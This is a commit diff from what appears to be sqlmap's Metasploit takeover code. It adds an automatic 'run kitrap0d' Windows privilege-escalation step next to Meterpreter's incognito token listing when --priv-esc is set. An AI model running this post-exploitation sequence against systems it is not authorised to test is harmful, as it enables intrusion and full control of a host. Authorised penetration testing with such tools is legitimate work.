Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 6437c16

Browse files
bdamelebdamele
committed
run kitrap0d script along with listing Windows Impersonation Tokens via meterpreter's incognito extension when --priv-esc is provided (see #149).
1 parent a97e20d commit 6437c16

2 files changed

Lines changed: 14 additions & 6 deletions

File tree

lib/takeover/metasploit.py

Lines changed: 10 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -187,9 +187,10 @@ def __selectEncoder(self, encode=True):
187187
def __selectPayload(self, askChurrasco=True):
188188
if kb.os == "Windows" and conf.privEsc:
189189
infoMsg = "forcing Metasploit payload to Meterpreter because "
190-
infoMsg += "it is the only payload that can abuse Windows "
191-
infoMsg += "Access Tokens via Meterpreter 'incognito' "
192-
infoMsg += "extension to privilege escalate"
190+
infoMsg += "it is the only payload that can be used to "
191+
infoMsg += "escalate privileges, either via 'incognito' "
192+
infoMsg += "extension or via 'kitrap0d' script, "
193+
infoMsg += "http://tinyurl.com/kitrap0d for details"
193194
logger.info(infoMsg)
194195

195196
__payloadStr = "windows/meterpreter"
@@ -458,6 +459,12 @@ def __loadMetExtensions(self, proc, metSess):
458459

459460
proc.stdin.write("list_tokens -u\n")
460461

462+
infoMsg = "trying also to escalate privileges using "
463+
infoMsg += "kitrap0d script"
464+
logger.info(infoMsg)
465+
466+
proc.stdin.write("run kitrap0d\n")
467+
461468
def __controlMsfCmd(self, proc, func):
462469
stdin_fd = sys.stdin.fileno()
463470
setNonBlocking(stdin_fd)

plugins/generic/takeover.py

Lines changed: 4 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -165,15 +165,16 @@ def osPwn(self):
165165
warnMsg = "by default PostgreSQL on Windows runs as postgres "
166166
warnMsg += "user which has no Windows Impersonation "
167167
warnMsg += "Tokens: it is unlikely that the privilege "
168-
warnMsg += "escalation will be successful"
168+
warnMsg += "escalation via 'incognito' extension will "
169+
warnMsg += "be successful"
169170
logger.warn(warnMsg)
170171

171172
elif kb.dbms == "Microsoft SQL Server" and kb.dbmsVersion[0] in ( "2005", "2008" ):
172173
warnMsg = "often Microsoft SQL Server %s " % kb.dbmsVersion[0]
173174
warnMsg += "runs as Network Service which has no Windows "
174175
warnMsg += "Impersonation Tokens within all threads, this "
175-
warnMsg += "makes Meterpreter's incognito extension to "
176-
warnMsg += "fail to list tokens"
176+
warnMsg += "makes Meterpreter's 'incognito' extension "
177+
warnMsg += "to fail to list tokens"
177178
logger.warn(warnMsg)
178179

179180
uploaded = self.uploadChurrasco()

0 commit comments

Comments
 (0)